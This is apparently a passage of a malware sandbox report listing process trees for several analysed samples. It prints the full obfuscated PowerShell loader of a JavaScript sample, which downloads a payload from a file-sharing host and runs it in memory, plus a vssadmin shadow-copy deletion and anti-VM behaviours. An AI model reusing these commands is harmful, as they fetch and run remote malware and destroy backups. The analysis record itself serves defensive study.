wBoACAAIgAuACoAKABIAGkAZwBoACAAUABlAHIAZgBvAHIAbQBhAG4AYwBlAHwATQDDAKEAeABpAG0AbwAgAEQAZQBzAGUAbQBwAGUAbgBoAG8AfABEAGUAcwBlAG0AcABlAG4AaABvACAATQDDAKEAeABpAG0AbwB8AEEAbAB0AG8AIABEAGUAcwBlAG0AcABlAG4AaABvACkALgAqACIAKQAgAHsACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAAJABnAHUAaQBkAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQAKACAAIAAgACAAIAAgACAAIAB9AAoAIAAgACAAIAB9AAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAbgB1AGwAbAAKAH0ACgAKACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkACAAPQAgAEcAZQB0AC0ASABpAGcAaABQAGUAcgBmAG8AcgBtAGEAbgBjAGUAUABvAHcAZQByAFAAbABhAG4ARwB1AGkAZAAKAHAAbwB3AGUAcgBjAGYAZwAgAC8AcwAgACQAbQBhAHgAUABlAHIAZgBHAHUAaQBkAAoACgAkAGcAcgBvAHUAcAAgAD0AIAAiACoAUwAtADEALQAxAC0AMAAiAAoAcwBlAGMAZQBkAGkAdAAgAC8AZQB4AHAAbwByAHQAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKACgARwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwApACAALQByAGUAcABsAGEAYwBlACAAJwBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAuACoAJwAsACAAIgBTAGUATABvAGMAawBNAGUAbQBvAHIAeQBQAHIAaQB2AGkAbABlAGcAZQAgAD0AIAAqACQAZwByAG8AdQBwACIAIAB8ACAAUwBlAHQALQBDAG8AbgB0AGUAbgB0ACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAHMAZQBjAGUAZABpAHQAIAAvAGMAbwBuAGYAaQBnAHUAcgBlACAALwBkAGIAIABzAGUAYwBlAGQAaQB0AC4AcwBkAGIAIAAvAGMAZgBnACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAgAC8AYQByAGUAYQBzACAAVQBTAEUAUgBfAFIASQBHAEgAVABTAAoAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAAcwBlAGMAYwBvAG4AZgBpAGcALgBjAGYAZwAKAAoAdgBzAHMAYQBkAG0AaQBuACAAZABlAGwAZQB0AGUAIABzAGgAYQBkAG8AdwBzACAALwBhAGwAbAAgAC8AcQB1AGkAZQB0AAoA
        6⤵
        
        PID:1872
        
        C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 65001
        7⤵
        
        PID:2856
        
        C:\Windows\system32\Dism.exe
        
        "C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:Microsoft-Windows-Subsystem-Linux /all /norestart
        7⤵
        Drops file in Windows directory
        
        PID:7760
        
        C:\Users\Admin\AppData\Local\Temp\46B24FE9-685D-40BE-939C-9390A5BECBDA\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\46B24FE9-685D-40BE-939C-9390A5BECBDA\dismhost.exe {E5FF47F0-D0AF-44D1-BEE9-690874F73840}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:7088
        
        C:\Windows\system32\Dism.exe
        
        "C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:VirtualMachinePlatform /all /norestart
        7⤵
        Drops file in Windows directory
        
        PID:4056
        
        C:\Users\Admin\AppData\Local\Temp\915FCAC6-6D68-42E7-8B6F-B6F242FA3FB9\dismhost.exe
        
        C:\Users\Admin\AppData\Local\Temp\915FCAC6-6D68-42E7-8B6F-B6F242FA3FB9\dismhost.exe {7E357D9C-E0F7-430D-8260-667A679D2345}
        8⤵
        Executes dropped EXE
        Drops file in Windows directory
        
        PID:2540
        
        C:\Windows\system32\wsl.exe
        
        "C:\Windows\system32\wsl.exe" --set-default-version 2
        7⤵
        
        PID:3512
        
        C:\Windows\system32\powercfg.exe
        
        "C:\Windows\system32\powercfg.exe" /list
        7⤵
        Power Settings
        
        PID:6568
        
        C:\Windows\system32\powercfg.exe
        
        "C:\Windows\system32\powercfg.exe" /s
        7⤵
        Power Settings
        
        PID:6672
        
        C:\Windows\system32\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /export /cfg secconfig.cfg
        7⤵
        
        PID:6204
        
        C:\Windows\system32\SecEdit.exe
        
        "C:\Windows\system32\SecEdit.exe" /configure /db secedit.sdb /cfg secconfig.cfg /areas USER_RIGHTS
        7⤵
        
        PID:3636
        
        C:\Windows\system32\vssadmin.exe
        
        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
        7⤵
        Interacts with shadow copies
        
        PID:3452

C:\Users\Admin\Downloads\samples\5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1\5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe
"C:\Users\Admin\Downloads\samples\5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1\5a4b8a265b4512cc6a8b192587a5c4c60f689165a6f75ec03c12cef3360355d1.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4420

C:\Users\Admin\Downloads\samples\8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4\8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe
"C:\Users\Admin\Downloads\samples\8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4\8cb31def2f17ac26ddeaea048880afeeb27049fcc3dcf07a5f0382406cfeddb4.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3900

C:\Users\Admin\Downloads\samples\b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807\b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807.exe
"C:\Users\Admin\Downloads\samples\b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807\b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:6084
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Users\Admin\Downloads\samples\b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807\b0fa52fead6b718bce1fd8816ad7201f648eb7483b3ec7cc284e26323e930807.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:4724

C:\Users\Admin\Downloads\samples\d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3\d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe
"C:\Users\Admin\Downloads\samples\d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3\d6ec39a61882bd8ccdb1c7a0b5a602baa3d9fd7120a19631014f46bc7c62d4a3.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:7468

C:\Users\Admin\Downloads\samples\e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d\e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d.exe
"C:\Users\Admin\Downloads\samples\e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d\e632189654d9ff1bf8a4efe340e0b04c6e09d6a1e4b5f4022573ed0871e7e03d.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6988

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\samples\f0c152c2a634e0af9c1ddc409de974a72db220a63fd48903c9ae8376285bdf05\f0c152c2a634e0af9c1ddc409de974a72db220a63fd48903c9ae8376285bdf05.js"
1⤵
- Checks computer location settings
PID:7368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAoACAAJABWAGUAUgBCAE8AUwBlAHAAcgBFAEYAZQBSAGUAbgBDAEUALgBUAG8AcwB0AHIAaQBuAGcAKAApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkATgAnACcAKQAoACAAKAAoACcAYgBjAGoAaQBtAGEAZwBlAFUAcgBsACcAKwAnACAAPQAgAFAAWABmAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA3AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAJwArACcAPQAyAEEAYQBfAGIAVwBvADkAUgBlAHUANAA1AHQANwBCAFUAMQBrAFYAZwBzAGQAOQBwAFQAOQBwAGcAUwBTAGwAdgBTAHQARwByAG4AVABJAEMAZgBGAGgAbQBUAEsAagAzAEwAQwA2AFMAUQB0AEkAYwBPAGMAXwBUADMANQB3ACYAcABrAF8AdgBpAGQAPQBmAGQANABmADYAMQA0AGIAYgAyADAAOQBjADYAMgBjADEANwAzADAAOQA0ADUAMQA3ADYAYQAwADkAMAA0AGYAIABQAFgAZgA7AGIAYwBqAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBiAGMAagBpACcAKwAnAG0AJwArACcAYQBnAGUAQgB5AHQAZQBzACAAPQAgAGIAYwBqAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABiAGMAJwArACcAagBpAG0AYQBnAGUAVQByAGwAKQA7AGIAYwBqAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuACcAKwAnAGMAbwBkAGkAbgBnAF0AOgAnACsAJwA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAGIAYwBqAGkAbQBhAGcAZQBCAHkAdABlAHMAJwArACcAKQA7AGIAYwBqAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFAAWABmADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AUAAnACsAJwBYAGYAOwBiAGMAagBlAG4AZABGAGwAYQBnACAAPQAgAFAAWABmADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBQAFgAZgA7AGIAYwBqACcAKwAnAHMAdABhAHIAdABJAG4AZABlAHgAJwArACcAIAA9ACAAYgBjAGoAJwArACcAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAYgBjAGoAcwB0AGEAcgAnACsAJwB0AEYAbABhAGcAKQA7AGIAYwBqAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABiAGMAagBpAG0AYQBnAGUAVABlAHgAJwArACcAdAAuAEkAbgBkAGUAeABPAGYAKAAnACsAJwBiAGMAagBlAG4AZABGAGwAYQBnACcAKwAnACkAOwBiAGMAagBzAHQAYQByAHQAJwArACcASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgAGIAYwBqAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAYgBjAGoAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGIAYwBqAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABiAGMAagBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAYgBjAGoAYgBhAHMAZQA2ADQATAAnACsAJwBlAG4AZwB0AGgAIAA9ACAAYgBjAGoAZQBuAGQASQBuAGQAZQB4ACAALQAgAGIAYwBqAHMAdABhAHIAdABJAG4AZABlAHgAOwBiAGMAJwArACcAagBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAGIAYwBqAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABiAGMAagBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABiACcAKwAnAGMAagBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAYgBjAGoAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAYgBjAGoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwAnACsAJwBDAGgAYQByAEEAcgByAGEAJwArACcAeQAoACkAIABwAGkAcwAgAEYAbwByAEUAYQAnACsAJwBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAnACsAJwBiAGMAagBfACAAfQApAFsALQAxAC4ALgAtACgAYgBjAGoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AGIAYwBqAGMAbwAnACsAJwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgAnACsAJwB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABiAGMAagBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7AGIAYwBqAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AJwArACcAUgBlACcAKwAnAGYAbABlAGMAJwArACcAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAYgBjAGoAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AGIAYwBqAHYAYQBpAE0AZQAnACsAJwB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQAJwArACcATQBlAHQAaABvAGQAKABQAFgAZgBWAEEASQBQAFgAZgApADsAYgBjAGoAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAnACsAJwAoAGIAYwBqAG4AdQBsAGwALAAgAEAAKABQAFgAZgB0AHgAdAAuAGsAcgBvAHcAdABlAG4ALwB2AGUAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyACcAKwAnAGEAMAA3ADUAYgAxACcAKwAnAGIAYwAwAGQANAA1AGIANgAzADIAZQBiADkAZQBlADYAMgAtAGIAJwArACcAdQAnACsAJwBwAC8ALwA6AHMAcAB0AHQAaABQAFgAZgAsACAAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsACAAUABYACcAKwAnAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsACAAJwArACcAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsACAAUABYAGYATQBTAEIAdQBpAGwAZABQAFgAZgAsACAAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsACAAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsAFAAWABmAGQAZQBzAGEAdABpAHYAYQBkAG8AUABYAGYALABQAFgAZgBkAGUAcwBhAHQAaQB2AGEAJwArACcAZABvAFAAWABmACwAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBQAFgAZgAsAFAAWABmAGQAZQBzAGEAdABpAHYAYQBkAG8AUABYAGYALABQAFgAZgBkAGUAcwBhAHQAaQB2AGEAZABvAFAAWABmACwAUABYAGYAMQBQAFgAZgAsAFAAWABmAGQAZQBzAGEAJwArACcAdABpAHYAYQBkAG8AUABYAGYAKQApADsAJwApACAALQByAEUAUABsAEEAQwBFACgAWwBjAEgAQQByAF0AOAAwACsAWwBjAEgAQQByAF0AOAA4ACsAWwBjAEgAQQByAF0AMQAwADIAKQAsAFsAYwBIAEEAcgBdADMAOQAtAHIARQBQAGwAQQBDAEUAJwBiAGMAagAnACwAWwBjAEgAQQByAF0AMwA2ACAAIAAtAEMAcgBlAHAATABBAEMAZQAgACAAKABbAGMASABBAHIAXQAxADEAMgArAFsAYwBIAEEAcgBdADEAMAA1ACsAWwBjAEgAQQByAF0AMQAxADUAKQAsAFsAYwBIAEEAcgBdADEAMgA0ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2724
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&( $VeRBOSeprEFeRenCE.Tostring()[1,3]+'x'-joIN'')( (('bcjimageUrl'+' = PXfhttps://1017.filemail.com/api/file/get?filekey'+'=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PXf;bcjwebClient = New-Object System.Net.WebClient;bcji'+'m'+'ageBytes = bcjwebClient.DownloadData(bc'+'jimageUrl);bcjimageText = [System.Text.En'+'coding]:'+':UTF8.GetString(bcjimageBytes'+');bcjstartFlag = PXf<<BASE64_START>>P'+'Xf;bcjendFlag = PXf<<BASE64_END>>PXf;bcj'+'startIndex'+' = bcj'+'imageText.IndexOf(bcjstar'+'tFlag);bcjendIndex = bcjimageTex'+'t.IndexOf('+'bcjendFlag'+');bcjstart'+'Index -ge 0 -and bcjendIndex -gt bcjstartIndex;bcjstartIndex += bcjstartFlag.Length;bcjbase64L'+'ength = bcjendIndex - bcjstartIndex;bc'+'jbase64Command = bcjimageText.Substring(bcjstartIndex, b'+'cjbase64Length);bcjbase64Reversed = -join (bcjbase64Command.To'+'CharArra'+'y() pis ForEa'+'ch-Object { '+'bcj_ })[-1..-(bcjbase64Command.Length)];bcjco'+'mmandBytes = [System.Conver'+'t]::FromBase64String(bcjbase64Reversed);bcjloadedAssembly = [System.'+'Re'+'flec'+'tion.Assembly]::Load(bcjcommandBytes);bcjvaiMe'+'thod = [dnlib.IO.Home].Get'+'Method(PXfVAIPXf);bcjvaiMethod.Invoke'+'(bcjnull, @(PXftxt.krowten/ved.2r.39b345302'+'a075b1'+'bc0d45b632eb9ee62-b'+'u'+'p//:sptthPXf, PXfdesativadoPXf, PX'+'fdesativadoPXf, '+'PXfdesativadoPXf, PXfMSBuildPXf, PXfdesativadoPXf, PXfdesativadoPXf,PXfdesativadoPXf,PXfdesativa'+'doPXf,PXfdesativado'+'PXf,PXfdesativadoPXf,PXfdesativadoPXf,PXf1PXf,PXfdesa'+'tivadoPXf));') -rEPlACE([cHAr]80+[cHAr]88+[cHAr]102),[cHAr]39-rEPlACE'bcj',[cHAr]36 -CrepLACe ([cHAr]112+[cHAr]105+[cHAr]115),[cHAr]124))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    PID:6492
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      PID:1684
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:444

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\samples\f0c152c2a634e0af9c1ddc409de974a72db220a63fd48903c9ae8376285bdf05\f0c152c2a634e0af9c1ddc409de974a72db220a63fd48903c9ae8376285bdf05.js"
1⤵
- Checks computer location settings
PID:6904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JgAoACAAJABWAGUAUgBCAE8AUwBlAHAAcgBFAEYAZQBSAGUAbgBDAEUALgBUAG8AcwB0AHIAaQBuAGcAKAApAFsAMQAsADMAXQArACcAeAAnAC0AagBvAEkATgAnACcAKQAoACAAKAAoACcAYgBjAGoAaQBtAGEAZwBlAFUAcgBsACcAKwAnACAAPQAgAFAAWABmAGgAdAB0AHAAcwA6AC8ALwAxADAAMQA3AC4AZgBpAGwAZQBtAGEAaQBsAC4AYwBvAG0ALwBhAHAAaQAvAGYAaQBsAGUALwBnAGUAdAA/AGYAaQBsAGUAawBlAHkAJwArACcAPQAyAEEAYQBfAGIAVwBvADkAUgBlAHUANAA1AHQANwBCAFUAMQBrAFYAZwBzAGQAOQBwAFQAOQBwAGcAUwBTAGwAdgBTAHQARwByAG4AVABJAEMAZgBGAGgAbQBUAEsAagAzAEwAQwA2AFMAUQB0AEkAYwBPAGMAXwBUADMANQB3ACYAcABrAF8AdgBpAGQAPQBmAGQANABmADYAMQA0AGIAYgAyADAAOQBjADYAMgBjADEANwAzADAAOQA0ADUAMQA3ADYAYQAwADkAMAA0AGYAIABQAFgAZgA7AGIAYwBqAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwBiAGMAagBpACcAKwAnAG0AJwArACcAYQBnAGUAQgB5AHQAZQBzACAAPQAgAGIAYwBqAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKABiAGMAJwArACcAagBpAG0AYQBnAGUAVQByAGwAKQA7AGIAYwBqAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuACcAKwAnAGMAbwBkAGkAbgBnAF0AOgAnACsAJwA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoAGIAYwBqAGkAbQBhAGcAZQBCAHkAdABlAHMAJwArACcAKQA7AGIAYwBqAHMAdABhAHIAdABGAGwAYQBnACAAPQAgAFAAWABmADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AUAAnACsAJwBYAGYAOwBiAGMAagBlAG4AZABGAGwAYQBnACAAPQAgAFAAWABmADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgBQAFgAZgA7AGIAYwBqACcAKwAnAHMAdABhAHIAdABJAG4AZABlAHgAJwArACcAIAA9ACAAYgBjAGoAJwArACcAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAYgBjAGoAcwB0AGEAcgAnACsAJwB0AEYAbABhAGcAKQA7AGIAYwBqAGUAbgBkAEkAbgBkAGUAeAAgAD0AIABiAGMAagBpAG0AYQBnAGUAVABlAHgAJwArACcAdAAuAEkAbgBkAGUAeABPAGYAKAAnACsAJwBiAGMAagBlAG4AZABGAGwAYQBnACcAKwAnACkAOwBiAGMAagBzAHQAYQByAHQAJwArACcASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgAGIAYwBqAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAYgBjAGoAcwB0AGEAcgB0AEkAbgBkAGUAeAA7AGIAYwBqAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIABiAGMAagBzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAYgBjAGoAYgBhAHMAZQA2ADQATAAnACsAJwBlAG4AZwB0AGgAIAA9ACAAYgBjAGoAZQBuAGQASQBuAGQAZQB4ACAALQAgAGIAYwBqAHMAdABhAHIAdABJAG4AZABlAHgAOwBiAGMAJwArACcAagBiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgAGIAYwBqAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKABiAGMAagBzAHQAYQByAHQASQBuAGQAZQB4ACwAIABiACcAKwAnAGMAagBiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAYgBjAGoAYgBhAHMAZQA2ADQAUgBlAHYAZQByAHMAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAYgBjAGoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAFQAbwAnACsAJwBDAGgAYQByAEEAcgByAGEAJwArACcAeQAoACkAIABwAGkAcwAgAEYAbwByAEUAYQAnACsAJwBjAGgALQBPAGIAagBlAGMAdAAgAHsAIAAnACsAJwBiAGMAagBfACAAfQApAFsALQAxAC4ALgAtACgAYgBjAGoAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAuAEwAZQBuAGcAdABoACkAXQA7AGIAYwBqAGMAbwAnACsAJwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgAnACsAJwB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABiAGMAagBiAGEAcwBlADYANABSAGUAdgBlAHIAcwBlAGQAKQA7AGIAYwBqAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AJwArACcAUgBlACcAKwAnAGYAbABlAGMAJwArACcAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAYgBjAGoAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAKQA7AGIAYwBqAHYAYQBpAE0AZQAnACsAJwB0AGgAbwBkACAAPQAgAFsAZABuAGwAaQBiAC4ASQBPAC4ASABvAG0AZQBdAC4ARwBlAHQAJwArACcATQBlAHQAaABvAGQAKABQAFgAZgBWAEEASQBQAFgAZgApADsAYgBjAGoAdgBhAGkATQBlAHQAaABvAGQALgBJAG4AdgBvAGsAZQAnACsAJwAoAGIAYwBqAG4AdQBsAGwALAAgAEAAKABQAFgAZgB0AHgAdAAuAGsAcgBvAHcAdABlAG4ALwB2AGUAZAAuADIAcgAuADMAOQBiADMANAA1ADMAMAAyACcAKwAnAGEAMAA3ADUAYgAxACcAKwAnAGIAYwAwAGQANAA1AGIANgAzADIAZQBiADkAZQBlADYAMgAtAGIAJwArACcAdQAnACsAJwBwAC8ALwA6AHMAcAB0AHQAaABQAFgAZgAsACAAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsACAAUABYACcAKwAnAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsACAAJwArACcAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsACAAUABYAGYATQBTAEIAdQBpAGwAZABQAFgAZgAsACAAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsACAAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwBQAFgAZgAsAFAAWABmAGQAZQBzAGEAdABpAHYAYQBkAG8AUABYAGYALABQAFgAZgBkAGUAcwBhAHQAaQB2AGEAJwArACcAZABvAFAAWABmACwAUABYAGYAZABlAHMAYQB0AGkAdgBhAGQAbwAnACsAJwBQAFgAZgAsAFAAWABmAGQAZQBzAGEAdABpAHYAYQBkAG8AUABYAGYALABQAFgAZgBkAGUAcwBhAHQAaQB2AGEAZABvAFAAWABmACwAUABYAGYAMQBQAFgAZgAsAFAAWABmAGQAZQBzAGEAJwArACcAdABpAHYAYQBkAG8AUABYAGYAKQApADsAJwApACAALQByAEUAUABsAEEAQwBFACgAWwBjAEgAQQByAF0AOAAwACsAWwBjAEgAQQByAF0AOAA4ACsAWwBjAEgAQQByAF0AMQAwADIAKQAsAFsAYwBIAEEAcgBdADMAOQAtAHIARQBQAGwAQQBDAEUAJwBiAGMAagAnACwAWwBjAEgAQQByAF0AMwA2ACAAIAAtAEMAcgBlAHAATABBAEMAZQAgACAAKABbAGMASABBAHIAXQAxADEAMgArAFsAYwBIAEEAcgBdADEAMAA1ACsAWwBjAEgAQQByAF0AMQAxADUAKQAsAFsAYwBIAEEAcgBdADEAMgA0ACkAKQA=';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
